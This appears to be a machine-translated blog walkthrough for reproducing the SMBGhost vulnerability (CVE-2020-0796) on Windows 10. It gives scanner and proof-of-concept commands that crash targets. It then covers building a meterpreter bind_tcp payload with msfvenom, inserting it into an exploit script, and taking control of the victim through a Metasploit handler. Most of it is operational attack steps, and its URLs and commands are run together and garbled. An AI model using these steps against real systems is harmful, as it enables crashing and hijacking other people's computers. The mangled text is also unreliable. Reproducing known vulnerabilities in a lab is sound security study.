Windows 10-CVE-2020-0796 Vulnerability Reappears

The vulnerability affects versions
of Windows 10 version 1903 for 32-bit systems Windows 10 version 1903 (for x64-based systems) Windows 10 version 1903 (for ARM64-based systems) Windows Server version 1903 (Server Core installation) for 32-bit Windows 10 version 1909 of the system Windows 10 version 1909 (for x64-based systems) Windows 10 version 1909 (for ARM64-based systems) Windows Server version 1909 (Server Core installation) Prerequisites Windows 10 has the firewall turned off and the attack machine is installed git and python environment vulnerability recurrence detection Vulnerability attack machine enters the command git clone https://github.com/ollypwn/SMBGhostpython3 scanner.py The target ip address pops up "IP address Vulnerable" is a vulnerability blue screen POC attack machine enters the command git clone https ://github.com/eerykitty/CVE-2020-0796-PoCpython3 setup.pyinstallpython3 CVE-2020-0796.py If the target ip address is blue screened, the attack is successful. POC privilege escalation attack machine enters the command git clone https:/ /github.com/danigargu/CVE-2020-07961. Generate Trojan msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444-b'\x00'-i1-f python2. Replace the code of USER_PAYLOAD in exploit.py in POC , and modify buf to USER_PAYLOAD
insert image description here
3. Start MSF
4. Enter the following command use exploit/multi/handlerset payload windows/x64/meterpreter/bind_tcpset lport4444set rhost target ip address run At this time, as long as the target machine runs the Trojan horse virus, it can be controlled, and we can operate the computer ps through the terminal : There may be encoding errors, and some characters may become unknown symbols

Guess you like

Origin blog.csdn.net/m0_73895181/article/details/132158489#comments_28060128